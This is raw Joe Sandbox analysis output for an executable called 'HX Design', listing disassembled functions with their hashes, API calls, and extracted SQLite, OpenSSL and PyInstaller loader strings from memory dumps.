                                                                                                                                                                                                                                                      • Opcode ID: 4828297cf84a1580d1be4d8346d77b2af936a330775195fb116fcdeafb873839
                                                                                                                                                                                                                                                      • Instruction ID: de5bc1cad1d584587fadb59e3a4e53b3b4f822fafe07b823e39829e1b7e92c6f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4828297cf84a1580d1be4d8346d77b2af936a330775195fb116fcdeafb873839
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16029C61B0AA8382EB19AB11A564FB973A0FF85B85F084135CE6E466F8DF3CF555C300
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFDFB31B1C3
                                                                                                                                                                                                                                                      • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFDFB31B2A4
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
                                                                                                                                                                                                                                                      • API String ID: 4225454184-875588658
                                                                                                                                                                                                                                                      • Opcode ID: 2f58605a80ece0dbe873986359c22506b80aa05e97296c1e5264f92375f5e100
                                                                                                                                                                                                                                                      • Instruction ID: 06a693535ae2e756ca31cb2cfedcfb249647af6a820bf34886ec253f2d71783a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f58605a80ece0dbe873986359c22506b80aa05e97296c1e5264f92375f5e100
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5E1C466F4A553AAFB21DF65D460BBC27E4AB05748F006035DE2E626EDEE3CE445C301
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • cannot add a STORED column, xrefs: 00007FFDFB337A72
                                                                                                                                                                                                                                                      • Cannot add a REFERENCES column with non-NULL default value, xrefs: 00007FFDFB3378ED
                                                                                                                                                                                                                                                      • UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q, xrefs: 00007FFDFB337B14
                                                                                                                                                                                                                                                      • Cannot add a column with non-constant default, xrefs: 00007FFDFB337969
                                                                                                                                                                                                                                                      • Cannot add a PRIMARY KEY column, xrefs: 00007FFDFB337881
                                                                                                                                                                                                                                                      • Cannot add a NOT NULL column with default value NULL, xrefs: 00007FFDFB33790F
                                                                                                                                                                                                                                                      • SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE, xrefs: 00007FFDFB337C5C
                                                                                                                                                                                                                                                      • Cannot add a UNIQUE column, xrefs: 00007FFDFB33789C
                                                                                                                                                                                                                                                      • SELECT raise(ABORT,%Q) FROM "%w"."%w", xrefs: 00007FFDFB3378F7, 00007FFDFB337973, 00007FFDFB337A81
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: Cannot add a NOT NULL column with default value NULL$Cannot add a PRIMARY KEY column$Cannot add a REFERENCES column with non-NULL default value$Cannot add a UNIQUE column$Cannot add a column with non-constant default$SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE$SELECT raise(ABORT,%Q) FROM "%w"."%w"$UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q$cannot add a STORED column
                                                                                                                                                                                                                                                      • API String ID: 4225454184-200680935
                                                                                                                                                                                                                                                      • Opcode ID: 5b4710b465af85f28d42b2c529d5cd9f71a28c578942a5c84c3729e8c5c3be64
                                                                                                                                                                                                                                                      • Instruction ID: 70e20b2f4b046896666b117807cfe9bbd7d559ae89a3fe29d8c81e567d84a882
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b4710b465af85f28d42b2c529d5cd9f71a28c578942a5c84c3729e8c5c3be64
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9BE15921B4AA87C2EB65AB159564FBA63E1FB44B88F084131CE6D077F9DF2CE591C700
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007
                                                                                                                                                                                                                                                      • String ID: ..\s\ssl\tls_srp.c$ssl_srp_ctx_init_intern
                                                                                                                                                                                                                                                      • API String ID: 3568877910-1794268454
                                                                                                                                                                                                                                                      • Opcode ID: 7c6f5f71629c738828d3fb28ae6d14af1525a41dda9b56dd32a690e7e5b3c519
                                                                                                                                                                                                                                                      • Instruction ID: 390bbfc50e81a22eb88c541d2384e373be61e9fdc7dcfb553dc3bfda9aa9a1f5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c6f5f71629c738828d3fb28ae6d14af1525a41dda9b56dd32a690e7e5b3c519
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6915226A0AB8281FB86DB25D4507FC6360FF85B44F184635DB5C4B7BAEF2CE6958310
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                      • String ID: P%
                                                                                                                                                                                                                                                      • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                      • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                      • Instruction ID: 0f3360b149681b7e4b9c729e51ed2cd11bf70a3dffbc8e03530394cc07474e5d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA51E526604BA187D624AF26A4181BAB7A1F798B61F404131EBDE83695DF7CD089DB20
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                                      • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                                      • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                                      • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                                      • Instruction ID: 8db2052b94fb66c2b72206f813024814f6b29c41213e9b733babec58ceb836df
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C21EC21B09A4292E7416B79F894179A250FF88B90FD84230DE2D873E5DE6CD54CD324
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2104253662.00007FFDFACE1000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDFACE0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104206646.00007FFDFACE0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104253662.00007FFDFAD2A000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104253662.00007FFDFAD38000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104253662.00007FFDFAD87000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104253662.00007FFDFAD8C000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104253662.00007FFDFAD8F000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104600723.00007FFDFAD90000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104654670.00007FFDFAD92000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdface0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 190073905-0
                                                                                                                                                                                                                                                      • Opcode ID: bfa090c531bac24e46e178867b034455b2b04e74abd31691ae896f8f055f72f8
                                                                                                                                                                                                                                                      • Instruction ID: ac138dfb6af36e37917bf408871fae4d50126f7f2736736dc0321be21fb89fda
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfa090c531bac24e46e178867b034455b2b04e74abd31691ae896f8f055f72f8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9819C29F1828786FF6C9B2598E1B7D6291AF85780F4880B5D96C573DEDE2CECC58700
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                      • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                      • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                      • Instruction ID: 0cd1ac7d8c32175691ddce0a0ce6c4ed9b91edcd19bf4850116295a5c3236c0a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD127061E0C283A6FB647A1CD1542BEF6A1FB50750FC44135E69B46AC4DFBCE588EB20
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                      • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                      • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                      • Instruction ID: ed78076f31f6aa2f294318ef55ec83903aa10f24e5db58e15f2d0d3763611756
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9129661E0C243A6FB247E18E054679F6A1FB80F54FD44035E69A47AC4DFBCE588EB60
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: %s %T already exists$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
                                                                                                                                                                                                                                                      • API String ID: 4225454184-2846519077
                                                                                                                                                                                                                                                      • Opcode ID: 84d25b8da552c185cdb89ee5e2906974b5069851bad6cc199998fa191b9faedd
                                                                                                                                                                                                                                                      • Instruction ID: 9209b9eca082a4334532132da81dc4e420f35ced02bdfcae5e7ea22b8c324939
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 84d25b8da552c185cdb89ee5e2906974b5069851bad6cc199998fa191b9faedd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7702BE62B1A68397EB14FB219820BA937E1FB85B88F005235CE6D177E9DF3DE5418700
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: new[]
                                                                                                                                                                                                                                                      • String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
                                                                                                                                                                                                                                                      • API String ID: 4059295235-3840279414
                                                                                                                                                                                                                                                      • Opcode ID: 7514e8fd5d93be79fc71e0024bcf4f49aeb845a9e117b097cb897556365a7ddf
                                                                                                                                                                                                                                                      • Instruction ID: 87b0afd167a4635567eb6968293f919ed13377caaee47d9eec4693968a8eaa9a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7514e8fd5d93be79fc71e0024bcf4f49aeb845a9e117b097cb897556365a7ddf
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1519311F0E2C385FB159F629831EBA6B91AF44B88F484036DE6D876EECE3CE5458301
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                      • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                      • Opcode ID: ebfdd443e66c36c88ce938ee0def13dbb25be8a39f0dedabf99b0800e1494f32
                                                                                                                                                                                                                                                      • Instruction ID: 214ca093491f94df52bd7333b87fe98486aa82ea463230b33745e3f7626d85cc
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ebfdd443e66c36c88ce938ee0def13dbb25be8a39f0dedabf99b0800e1494f32
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A41A221B08652A6EA10FB15E8046BAE391FF44FC4FC44432ED8C4B796DEBCE509E764
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(?,?,00000000,00007FF732063CBB), ref: 00007FF732068704
                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00007FF732063CBB), ref: 00007FF73206870A
                                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00007FF732063CBB), ref: 00007FF73206874C
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732068830: GetEnvironmentVariableW.KERNEL32(00007FF73206388E), ref: 00007FF732068867
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732068830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF732068889
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732078238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF732078251
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732062810: MessageBoxW.USER32 ref: 00007FF7320628EA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                      • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                                      • Opcode ID: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                                                                                                                                                                                      • Instruction ID: d0dd66a154c182609d2c8bcf00ad31e4365669649a75384d994d52692b1424e4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D41C611B19642A4FA10FB25B8952BAD291EF84BC0FC00131ED4D47BDAEEBCE50DE324
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
